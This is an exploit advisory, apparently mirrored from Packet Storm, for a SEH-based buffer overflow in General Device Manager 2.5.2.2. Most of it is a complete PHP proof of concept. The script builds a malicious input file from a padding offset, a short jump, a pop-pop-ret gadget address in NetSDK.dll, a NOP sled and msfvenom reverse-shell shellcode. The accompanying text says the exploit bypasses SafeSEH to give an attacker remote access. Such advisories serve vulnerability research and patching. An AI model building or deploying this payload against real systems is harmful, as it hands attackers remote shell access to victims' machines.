General Device Manager 2.5.2.2 Buffer Overflow

🗓️ 14 Mar 2025 00:00:00Reported by indoushkaType
packetstorm🔗 packetstorm.news👁 301 Views
Buffer overflow vulnerability in General Device Manager 2.5.2.2 allows remote code execution.
=============================================================================================================================================
    | # Title     : General Device Manager 2.5.2.2 shell reverse Vulnerability                                                                  |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits)                                                            |
    | # Vendor    : https://www.maxiguvenlik.com/uploads/importfiles/General_DeviceManager.zip                                                  |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking İn Google Or Other Search Enggine.
    
    [+] Code Description: The converted code is part of a buffer overflow attack, which aims to exploit a vulnerability in software applications by injecting malicious shellcode.
                          
    					  The purpose of this code is to exploit a Buffer Overflow vulnerability in General Device Manager 2.5.2.2 When this program is run, 
    					  
    					  security barriers such as SafeSEH are bypassed, and a location in memory containing the malicious code is transferred, thus allowing the attacker to interact with the victim's machine remotely.
    
       (Related : https://packetstorm.news/files/id/173876/ Related CVE numbers:  ) .
    	
    [+] save code as poc.php.
    
    [+] Usage: php script.php
    
    [+] PayLoad :
    
    
    <?php
    $offset = str_repeat("A", 1308);
    
    $nseh = "\xEB\x06\x90\x90"; // jmp short
    
    $seh = pack('V', 0x10081827); // 0x10081827 : pop ebx # pop esi # ret  | ascii {PAGE_EXECUTE_READ} [NetSDK.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v4.0.8.66 (C:\Program Files (x86)\DeviceManage\NetSDK.dll)
    
    $nops = str_repeat("\x90", 32); 
    
    // shellcode: msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=1337 EXITFUNC=thread -a x86 --platform windows -b "\x00\x0a\x0d" -f python --var-name shellcode
    
    $shellcode =  "";
    $shellcode .= "\xd9\xc6\xbb\xae\xc7\xed\x8e\xd9\x74\x24\xf4";
    $shellcode .= "\x5a\x29\xc9\xb1\x52\x83\xea\xfc\x31\x5a\x13";
    $shellcode .= "\x03\xf4\xd4\x0f\x7b\xf4\x33\x4d\x84\x04\xc4";
    $shellcode .= "\x32\x0c\xe1\xf5\x72\x6a\x62\xa5\x42\xf8\x26";
    $shellcode .= "\x4a\x28\xac\xd2\xd9\x5c\x79\xd5\x6a\xea\x5f";
    $shellcode .= "\xd8\x6b\x47\xa3\x7b\xe8\x9a\xf0\x5b\xd1\x54";
    $shellcode .= "\x05\x9a\x16\x88\xe4\xce\xcf\xc6\x5b\xfe\x64";
    $shellcode .= "\x92\x67\x75\x36\x32\xe0\x6a\x8f\x35\xc1\x3d";
    $shellcode .= "\x9b\x6f\xc1\xbc\x48\x04\x48\xa6\x8d\x21\x02";
    $shellcode .= "\x5d\x65\xdd\x95\xb7\xb7\x1e\x39\xf6\x77\xed";
    $shellcode .= "\x43\x3f\xbf\x0e\x36\x49\xc3\xb3\x41\x8e\xb9";
    $shellcode .= "\x6f\xc7\x14\x19\xfb\x7f\xf0\x9b\x28\x19\x73";
    $shellcode .= "\x97\x85\x6d\xdb\xb4\x18\xa1\x50\xc0\x91\x44";
    $shellcode .= "\xb6\x40\xe1\x62\x12\x08\xb1\x0b\x03\xf4\x14";
    $shellcode .= "\x33\x53\x57\xc8\x91\x18\x7a\x1d\xa8\x43\x13";
    $shellcode .= "\xd2\x81\x7b\xe3\x7c\x91\x08\xd1\x23\x09\x86";
    $shellcode .= "\x59\xab\x97\x51\x9d\x86\x60\xcd\x60\x29\x91";
    $shellcode .= "\xc4\xa6\x7d\xc1\x7e\x0e\xfe\x8a\x7e\xaf\x2b";
    $shellcode .= "\x1c\x2e\x1f\x84\xdd\x9e\xdf\x74\xb6\xf4\xef";
    $shellcode .= "\xab\xa6\xf7\x25\xc4\x4d\x02\xae\x94\x91\x0c";
    $shellcode .= "\x2f\x03\x90\x0c\x2a\xea\x1d\xea\x5e\x1c\x48";
    $shellcode .= "\xa5\xf6\x85\xd1\x3d\x66\x49\xcc\x38\xa8\xc1";
    $shellcode .= "\xe3\xbd\x67\x22\x89\xad\x10\xc2\xc4\x8f\xb7";
    $shellcode .= "\xdd\xf2\xa7\x54\x4f\x99\x37\x12\x6c\x36\x60";
    $shellcode .= "\x73\x42\x4f\xe4\x69\xfd\xf9\x1a\x70\x9b\xc2";
    $shellcode .= "\x9e\xaf\x58\xcc\x1f\x3d\xe4\xea\x0f\xfb\xe5";
    $shellcode .= "\xb6\x7b\x53\xb0\x60\xd5\x15\x6a\xc3\x8f\xcf";
    $shellcode .= "\xc1\x8d\x47\x89\x29\x0e\x11\x96\x67\xf8\xfd";
    $shellcode .= "\x27\xde\xbd\x02\x87\xb6\x49\x7b\xf5\x26\xb5";
    $shellcode .= "\x56\xbd\x47\x54\x72\xc8\xef\xc1\x17\x71\x72";
    $shellcode .= "\xf2\xc2\xb6\x8b\x71\xe6\x46\x68\x69\x83\x43";
    $shellcode .= "\x34\x2d\x78\x3e\x25\xd8\x7e\xed\x46\xc9";
    
    $final_payload = $offset . $nseh . $seh . $nops . $shellcode;
    
    // write the final payload to a file
    try {
        $file = fopen('indoushka.txt', 'wb');
        echo "[+] Creating " . strlen($final_payload) . " bytes evil payload...\n";
        fwrite($file, $final_payload);
        fclose($file);
        echo "[+] File created!\n";
    } catch (Exception $e) {
        echo "File cannot be created!\n";
    }
    ?>
    
    
    
    
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================
14 Mar 2025 00:00Current
7.9High risk
Vulners AI Score7.9